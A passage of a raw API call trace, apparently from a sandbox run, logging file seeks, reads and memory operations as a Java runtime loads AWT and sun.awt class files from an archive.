hFile=0x134, liDistanceToMove=0x2ff16d8, lpNewFilePointer=0x208da10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da10*=50271960) returned 1 [0135.092] ReadFile (in: hFile=0x134, lpBuffer=0x208da60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d9e0, lpOverlapped=0x0 | out: lpBuffer=0x208da60*, lpNumberOfBytesRead=0x208d9e0*=0x1e, lpOverlapped=0x0) returned 1 [0135.092] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff1710, lpNewFilePointer=0x208da70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da70*=50272016) returned 1 [0135.092] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x414, lpNumberOfBytesRead=0x208da40, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208da40*=0x414, lpOverlapped=0x0) returned 1 [0135.093] free (_Block=0x12d60c00) [0135.093] free (_Block=0x12e5ee80) [0135.094] strlen (_Str="sun/misc/JavaAWTAccess.class") returned 0x1c [0135.094] malloc (_Size=0x48) returned 0x12e5fb50 [0135.094] malloc (_Size=0xa0) returned 0x12dac7b0 [0135.094] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34133ff, lpNewFilePointer=0x208d350, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d350*=54604799) returned 1 [0135.094] ReadFile (in: hFile=0x134, lpBuffer=0x12dac7b0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d320, lpOverlapped=0x0 | out: lpBuffer=0x12dac7b0*, lpNumberOfBytesRead=0x208d320*=0xa0, lpOverlapped=0x0) returned 1 [0135.095] malloc (_Size=0x1d) returned 0x12ddae90 [0135.095] strlen (_Str="sun/misc/JavaAWTAccess.class") returned 0x1c [0135.095] strcpy (in: _Dest=0x208d4d0, _Source="sun/misc/JavaAWTAccess.class" | out: _Dest="sun/misc/JavaAWTAccess.class") returned="sun/misc/JavaAWTAccess.class" [0135.095] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff1622, lpNewFilePointer=0x208cf50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf50*=50271778) returned 1 [0135.095] ReadFile (in: hFile=0x134, lpBuffer=0x208cfa0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cf20, lpOverlapped=0x0 | out: lpBuffer=0x208cfa0*, lpNumberOfBytesRead=0x208cf20*=0x1e, lpOverlapped=0x0) returned 1 [0135.095] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff165c, lpNewFilePointer=0x208cfb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cfb0*=50271836) returned 1 [0135.095] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b830, nNumberOfBytesToRead=0x7c, lpNumberOfBytesRead=0x208cf80, lpOverlapped=0x0 | out: lpBuffer=0x12e6b830*, lpNumberOfBytesRead=0x208cf80*=0x7c, lpOverlapped=0x0) returned 1 [0135.096] free (_Block=0x12dda980) [0135.096] free (_Block=0x12e5f150) [0135.099] malloc (_Size=0x48) returned 0x12e5ee80 [0135.099] malloc (_Size=0xa0) returned 0x12dab260 [0135.099] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34133b7, lpNewFilePointer=0x208e6f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e6f0*=54604727) returned 1 [0135.099] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e6c0, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208e6c0*=0xa0, lpOverlapped=0x0) returned 1 [0135.100] malloc (_Size=0x1b) returned 0x12ddaec0 [0135.100] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff0ef7, lpNewFilePointer=0x208e2f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2f0*=50269943) returned 1 [0135.100] ReadFile (in: hFile=0x134, lpBuffer=0x208e340, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e2c0, lpOverlapped=0x0 | out: lpBuffer=0x208e340*, lpNumberOfBytesRead=0x208e2c0*=0x1e, lpOverlapped=0x0) returned 1 [0135.100] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff0f2f, lpNewFilePointer=0x208e350, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e350*=50269999) returned 1 [0135.100] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x6f3, lpNumberOfBytesRead=0x208e320, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208e320*=0x6f3, lpOverlapped=0x0) returned 1 [0135.103] malloc (_Size=0x48) returned 0x12e5f1a0 [0135.103] malloc (_Size=0xa0) returned 0x12dab890 [0135.103] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341336f, lpNewFilePointer=0x208d9b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d9b0*=54604655) returned 1 [0135.103] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d980, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208d980*=0xa0, lpOverlapped=0x0) returned 1 [0135.103] malloc (_Size=0x1b) returned 0x12ddab90 [0135.103] strlen (_Str="sun/awt/AppContext$2.class") returned 0x1a [0135.103] strcpy (in: _Dest=0x208db30, _Source="sun/awt/AppContext$2.class" | out: _Dest="sun/awt/AppContext$2.class") returned="sun/awt/AppContext$2.class" [0135.104] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff0b34, lpNewFilePointer=0x208d5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d5b0*=50268980) returned 1 [0135.104] ReadFile (in: hFile=0x134, lpBuffer=0x208d600, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d580, lpOverlapped=0x0 | out: lpBuffer=0x208d600*, lpNumberOfBytesRead=0x208d580*=0x1e, lpOverlapped=0x0) returned 1 [0135.104] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2ff0b6c, lpNewFilePointer=0x208d610, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d610*=50269036) returned 1 [0135.104] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x38b, lpNumberOfBytesRead=0x208d5e0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208d5e0*=0x38b, lpOverlapped=0x0) returned 1 [0135.104] free (_Block=0x12ddaec0) [0135.105] free (_Block=0x12e5ee80) [0135.142] strlen (_Str="sun/awt/AppContext$State.class") returned 0x1e [0135.142] malloc (_Size=0x48) returned 0x12e5f790 [0135.142] malloc (_Size=0xa0) returned 0x12dabd60 [0135.142] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412e25, lpNewFilePointer=0x208cb30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb30*=54603301) returned 1 [0135.142] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cb00, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208cb00*=0xa0, lpOverlapped=0x0) returned 1 [0135.142] malloc (_Size=0x1f) returned 0x12dda980 [0135.143] strlen (_Str="sun/awt/AppContext$State.class") returned 0x1e [0135.143] strcpy (in: _Dest=0x208ccb0, _Source="sun/awt/AppContext$State.class" | out: _Dest="sun/awt/AppContext$State.class") returned="sun/awt/AppContext$State.class" [0135.143] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe1e5b, lpNewFilePointer=0x208c730, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c730*=50208347) returned 1 [0135.143] ReadFile (in: hFile=0x134, lpBuffer=0x208c780, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c700, lpOverlapped=0x0 | out: lpBuffer=0x208c780*, lpNumberOfBytesRead=0x208c700*=0x1e, lpOverlapped=0x0) returned 1 [0135.144] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe1e97, lpNewFilePointer=0x208c790, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c790*=50208407) returned 1 [0135.144] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x36d, lpNumberOfBytesRead=0x208c760, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208c760*=0x36d, lpOverlapped=0x0) returned 1 [0135.144] free (_Block=0x12ddab90) [0135.145] free (_Block=0x12e5f1a0) [0135.153] strlen (_Str="sun/awt/AppContext$1.class") returned 0x1a [0135.153] malloc (_Size=0x48) returned 0x12e5fd80 [0135.153] malloc (_Size=0xa0) returned 0x12daace0 [0135.153] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412ddd, lpNewFilePointer=0x208cc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc70*=54603229) returned 1 [0135.155] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc40, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208cc40*=0xa0, lpOverlapped=0x0) returned 1 [0135.155] malloc (_Size=0x1b) returned 0x12dda9e0 [0135.155] strlen (_Str="sun/awt/AppContext$1.class") returned 0x1a [0135.155] strcpy (in: _Dest=0x208cdf0, _Source="sun/awt/AppContext$1.class" | out: _Dest="sun/awt/AppContext$1.class") returned="sun/awt/AppContext$1.class" [0135.155] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe1b62, lpNewFilePointer=0x208c870, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c870*=50207586) returned 1 [0135.155] ReadFile (in: hFile=0x134, lpBuffer=0x208c8c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c840, lpOverlapped=0x0 | out: lpBuffer=0x208c8c0*, lpNumberOfBytesRead=0x208c840*=0x1e, lpOverlapped=0x0) returned 1 [0135.156] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fe1b9a, lpNewFilePointer=0x208c8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8d0*=50207642) returned 1 [0135.156] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x2c1, lpNumberOfBytesRead=0x208c8a0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208c8a0*=0x2c1, lpOverlapped=0x0) returned 1 [0135.156] free (_Block=0x12dda980) [0135.156] free (_Block=0x12e5f790) [0135.162] strlen (_Str="java/awt/EventQueue") returned 0x13 [0135.163] strlen (_Str="java/awt/EventQueue.class") returned 0x19 [0135.163] malloc (_Size=0x48) returned 0x12e5f290 [0135.163] malloc (_Size=0xa0) returned 0x12dac440 [0135.163] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412d96, lpNewFilePointer=0x208d1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1b0*=54603158) returned 1 [0135.163] ReadFile (in: hFile=0x134, lpBuffer=0x12dac440, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d180, lpOverlapped=0x0 | out: lpBuffer=0x12dac440*, lpNumberOfBytesRead=0x208d180*=0xa0, lpOverlapped=0x0) returned 1 [0135.163] malloc (_Size=0x1a) returned 0x12dda980 [0135.163] strlen (_Str="java/awt/EventQueue.class") returned 0x19 [0135.164] strcpy (in: _Dest=0x208d330, _Source="java/awt/EventQueue.class" | out: _Dest="java/awt/EventQueue.class") returned="java/awt/EventQueue.class" [0135.164] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdd904, lpNewFilePointer=0x208cdb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdb0*=50190596) returned 1 [0135.164] ReadFile (in: hFile=0x134, lpBuffer=0x208ce00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cd80, lpOverlapped=0x0 | out: lpBuffer=0x208ce00*, lpNumberOfBytesRead=0x208cd80*=0x1e, lpOverlapped=0x0) returned 1 [0135.164] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdd93b, lpNewFilePointer=0x208ce10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce10*=50190651) returned 1 [0135.164] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x4227, lpNumberOfBytesRead=0x208cde0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208cde0*=0x4227, lpOverlapped=0x0) returned 1 [0135.166] free (_Block=0x12dda9e0) [0135.167] free (_Block=0x12e5fd80) [0135.174] malloc (_Size=0x48) returned 0x12e5eed0 [0135.174] malloc (_Size=0xa0) returned 0x12dab940 [0135.174] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412d4d, lpNewFilePointer=0x208c460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c460*=54603085) returned 1 [0135.174] ReadFile (in: hFile=0x134, lpBuffer=0x12dab940, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c430, lpOverlapped=0x0 | out: lpBuffer=0x12dab940*, lpNumberOfBytesRead=0x208c430*=0xa0, lpOverlapped=0x0) returned 1 [0135.174] malloc (_Size=0x1c) returned 0x12ddae90 [0135.175] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdd7b4, lpNewFilePointer=0x208c060, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c060*=50190260) returned 1 [0135.175] ReadFile (in: hFile=0x134, lpBuffer=0x208c0b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c030, lpOverlapped=0x0 | out: lpBuffer=0x208c0b0*, lpNumberOfBytesRead=0x208c030*=0x1e, lpOverlapped=0x0) returned 1 [0135.175] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdd7ed, lpNewFilePointer=0x208c0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0c0*=50190317) returned 1 [0135.175] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x117, lpNumberOfBytesRead=0x208c090, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208c090*=0x117, lpOverlapped=0x0) returned 1 [0135.176] malloc (_Size=0x48) returned 0x12e5fd30 [0135.176] malloc (_Size=0xa0) returned 0x12daace0 [0135.176] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412d04, lpNewFilePointer=0x208c460, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c460*=54603012) returned 1 [0135.176] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c430, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c430*=0xa0, lpOverlapped=0x0) returned 1 [0135.176] malloc (_Size=0x1c) returned 0x12ddab90 [0135.176] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdd272, lpNewFilePointer=0x208c060, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c060*=50188914) returned 1 [0135.176] ReadFile (in: hFile=0x134, lpBuffer=0x208c0b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c030, lpOverlapped=0x0 | out: lpBuffer=0x208c0b0*, lpNumberOfBytesRead=0x208c030*=0x1e, lpOverlapped=0x0) returned 1 [0135.177] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdd2ab, lpNewFilePointer=0x208c0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0c0*=50188971) returned 1 [0135.177] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x509, lpNumberOfBytesRead=0x208c090, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208c090*=0x509, lpOverlapped=0x0) returned 1 [0135.177] malloc (_Size=0x48) returned 0x12e5f880 [0135.177] malloc (_Size=0xa0) returned 0x12dac390 [0135.177] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412caa, lpNewFilePointer=0x208b9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9a0*=54602922) returned 1 [0135.177] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b970, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208b970*=0xa0, lpOverlapped=0x0) returned 1 [0135.177] malloc (_Size=0x2d) returned 0x12d61100 [0135.178] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdcf3b, lpNewFilePointer=0x208b5a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5a0*=50188091) returned 1 [0135.178] ReadFile (in: hFile=0x134, lpBuffer=0x208b5f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b570, lpOverlapped=0x0 | out: lpBuffer=0x208b5f0*, lpNumberOfBytesRead=0x208b570*=0x1e, lpOverlapped=0x0) returned 1 [0135.179] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdcf85, lpNewFilePointer=0x208b600, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b600*=50188165) returned 1 [0135.179] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b950, nNumberOfBytesToRead=0x2ed, lpNumberOfBytesRead=0x208b5d0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b950*, lpNumberOfBytesRead=0x208b5d0*=0x2ed, lpOverlapped=0x0) returned 1 [0135.182] strlen (_Str="java/awt/Queue.class") returned 0x14 [0135.182] malloc (_Size=0x48) returned 0x12e5fc90 [0135.182] malloc (_Size=0xa0) returned 0x12dab890 [0135.182] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412c68, lpNewFilePointer=0x208c3b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c3b0*=54602856) returned 1 [0135.182] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c380, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208c380*=0xa0, lpOverlapped=0x0) returned 1 [0135.182] malloc (_Size=0x15) returned 0x12f4ef60 [0135.182] strlen (_Str="java/awt/Queue.class") returned 0x14 [0135.182] strcpy (in: _Dest=0x208c530, _Source="java/awt/Queue.class" | out: _Dest="java/awt/Queue.class") returned="java/awt/Queue.class" [0135.182] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdce4f, lpNewFilePointer=0x208bfb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfb0*=50187855) returned 1 [0135.182] ReadFile (in: hFile=0x134, lpBuffer=0x208c000, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf80, lpOverlapped=0x0 | out: lpBuffer=0x208c000*, lpNumberOfBytesRead=0x208bf80*=0x1e, lpOverlapped=0x0) returned 1 [0135.183] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdce81, lpNewFilePointer=0x208c010, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c010*=50187905) returned 1 [0135.183] ReadFile (in: hFile=0x134, lpBuffer=0x20fe960, nNumberOfBytesToRead=0xba, lpNumberOfBytesRead=0x208bfe0, lpOverlapped=0x0 | out: lpBuffer=0x20fe960*, lpNumberOfBytesRead=0x208bfe0*=0xba, lpOverlapped=0x0) returned 1 [0135.183] free (_Block=0x12d61100) [0135.183] free (_Block=0x12e5f880) [0135.191] strlen (_Str="sun/awt/MostRecentKeyValue.class") returned 0x20 [0135.191] malloc (_Size=0x48) returned 0x12e5f060 [0135.191] malloc (_Size=0xa0) returned 0x12dac9c0 [0135.191] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412c1a, lpNewFilePointer=0x208c310, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c310*=54602778) returned 1 [0135.191] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c2e0, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208c2e0*=0xa0, lpOverlapped=0x0) returned 1 [0135.191] malloc (_Size=0x21) returned 0x12ddae90 [0135.192] strlen (_Str="sun/awt/MostRecentKeyValue.class") returned 0x20 [0135.192] strcpy (in: _Dest=0x208c490, _Source="sun/awt/MostRecentKeyValue.class" | out: _Dest="sun/awt/MostRecentKeyValue.class") returned="sun/awt/MostRecentKeyValue.class" [0135.192] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdccda, lpNewFilePointer=0x208bf10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf10*=50187482) returned 1 [0135.192] ReadFile (in: hFile=0x134, lpBuffer=0x208bf60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bee0, lpOverlapped=0x0 | out: lpBuffer=0x208bf60*, lpNumberOfBytesRead=0x208bee0*=0x1e, lpOverlapped=0x0) returned 1 [0135.192] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdcd18, lpNewFilePointer=0x208bf70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf70*=50187544) returned 1 [0135.192] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x137, lpNumberOfBytesRead=0x208bf40, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208bf40*=0x137, lpOverlapped=0x0) returned 1 [0135.192] free (_Block=0x12f4ef60) [0135.192] free (_Block=0x12e5fc90) [0135.198] strlen (_Str="sun/awt/PostEventQueue.class") returned 0x1c [0135.198] malloc (_Size=0x48) returned 0x12e5fe20 [0135.198] malloc (_Size=0xa0) returned 0x12dab9f0 [0135.198] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3412bd0, lpNewFilePointer=0x208cc80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc80*=54602704) returned 1 [0135.198] ReadFile (in: hFile=0x134, lpBuffer=0x12dab9f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc50, lpOverlapped=0x0 | out: lpBuffer=0x12dab9f0*, lpNumberOfBytesRead=0x208cc50*=0xa0, lpOverlapped=0x0) returned 1 [0135.198] malloc (_Size=0x1d) returned 0x12ddaec0 [0135.198] strlen (_Str="sun/awt/PostEventQueue.class") returned 0x1c [0135.198] strcpy (in: _Dest=0x208ce00, _Source="sun/awt/PostEventQueue.class" | out: _Dest="sun/awt/PostEventQueue.class") returned="sun/awt/PostEventQueue.class" [0135.198] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdc670, lpNewFilePointer=0x208c880, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c880*=50185840) returned 1 [0135.198] ReadFile (in: hFile=0x134, lpBuffer=0x208c8d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c850, lpOverlapped=0x0 | out: lpBuffer=0x208c8d0*, lpNumberOfBytesRead=0x208c850*=0x1e, lpOverlapped=0x0) returned 1 [0135.199] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fdc6aa, lpNewFilePointer=0x208c8e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8e0*=50185898) returned 1 [0135.199] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x630, lpNumberOfBytesRead=0x208c8b0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208c8b0*=0x630, lpOverlapped=0x0) returned 1 [0135.199] free (_Block=0x12ddae90) [0135.199] free (_Block=0x12e5f060) [0135.206] strlen (_Str="sun/awt/windows/WDesktopPeer.class") returned 0x22 [0135.206] malloc (_Size=0x48) returned 0x12e5ffb0 [0135.206] malloc (_Size=0xa0) returned 0x12dac9c0 [0135.206] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33b0ef8, lpNewFilePointer=0x208e680, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e680*=54202104) returned 1 [0135.207] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e650, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208e650*=0xa0, lpOverlapped=0x0) returned 1 [0135.208] malloc (_Size=0x23) returned 0x12dda980 [0135.208] strlen (_Str="sun/awt/windows/WDesktopPeer.class") returned 0x22 [0135.208] strcpy (in: _Dest=0x208e800, _Source="sun/awt/windows/WDesktopPeer.class" | out: _Dest="sun/awt/windows/WDesktopPeer.class") returned="sun/awt/windows/WDesktopPeer.class" [0135.208] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x235344d, lpNewFilePointer=0x208e280, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e280*=37041229) returned 1 [0135.208] ReadFile (in: hFile=0x134, lpBuffer=0x208e2d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e250, lpOverlapped=0x0 | out: lpBuffer=0x208e2d0*, lpNumberOfBytesRead=0x208e250*=0x1e, lpOverlapped=0x0) returned 1 [0135.210] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x235348d, lpNewFilePointer=0x208e2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2e0*=37041293) returned 1 [0135.210] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x688, lpNumberOfBytesRead=0x208e2b0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208e2b0*=0x688, lpOverlapped=0x0) returned 1 [0135.211] free (_Block=0x12ddaec0) [0135.211] free (_Block=0x12e5fe20) [0135.212] strlen (_Str="java/awt/peer/DesktopPeer.class") returned 0x1f [0135.212] malloc (_Size=0x48) returned 0x12e5fa60 [0135.212] malloc (_Size=0xa0) returned 0x12dac4f0 [0135.212] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x331ef2a, lpNewFilePointer=0x208dbc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbc0*=53604138) returned 1 [0135.212] ReadFile (in: hFile=0x134, lpBuffer=0x12dac4f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208db90, lpOverlapped=0x0 | out: lpBuffer=0x12dac4f0*, lpNumberOfBytesRead=0x208db90*=0xa0, lpOverlapped=0x0) returned 1 [0135.218] malloc (_Size=0x20) returned 0x12dda9e0 [0135.218] strlen (_Str="java/awt/peer/DesktopPeer.class") returned 0x1f [0135.218] strcpy (in: _Dest=0x208dd40, _Source="java/awt/peer/DesktopPeer.class" | out: _Dest="java/awt/peer/DesktopPeer.class") returned="java/awt/peer/DesktopPeer.class" [0135.218] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x163c069, lpNewFilePointer=0x208d7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d7c0*=23314537) returned 1 [0135.218] ReadFile (in: hFile=0x134, lpBuffer=0x208d810, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d790, lpOverlapped=0x0 | out: lpBuffer=0x208d810*, lpNumberOfBytesRead=0x208d790*=0x1e, lpOverlapped=0x0) returned 1 [0135.221] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x163c0a6, lpNewFilePointer=0x208d820, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d820*=23314598) returned 1 [0135.221] ReadFile (in: hFile=0x134, lpBuffer=0x12e6baa0, nNumberOfBytesToRead=0x1ab, lpNumberOfBytesRead=0x208d7f0, lpOverlapped=0x0 | out: lpBuffer=0x12e6baa0*, lpNumberOfBytesRead=0x208d7f0*=0x1ab, lpOverlapped=0x0) returned 1 [0135.221] free (_Block=0x12dda980) [0135.222] free (_Block=0x12e5ffb0) [0135.229] malloc (_Size=0x48) returned 0x12e5ff60 [0135.229] malloc (_Size=0xa0) returned 0x12dab260 [0135.229] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x331926c, lpNewFilePointer=0x208e610, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e610*=53580396) returned 1 [0135.229] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e5e0, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208e5e0*=0xa0, lpOverlapped=0x0) returned 1 [0135.230] malloc (_Size=0x1e) returned 0x12ddae90 [0135.230] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1593a89, lpNewFilePointer=0x208e210, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e210*=22624905) returned 1 [0135.230] ReadFile (in: hFile=0x134, lpBuffer=0x208e260, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e1e0, lpOverlapped=0x0 | out: lpBuffer=0x208e260*, lpNumberOfBytesRead=0x208e1e0*=0x1e, lpOverlapped=0x0) returned 1 [0135.231] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1593ac4, lpNewFilePointer=0x208e270, dwMoveMethod=0x0 | out: 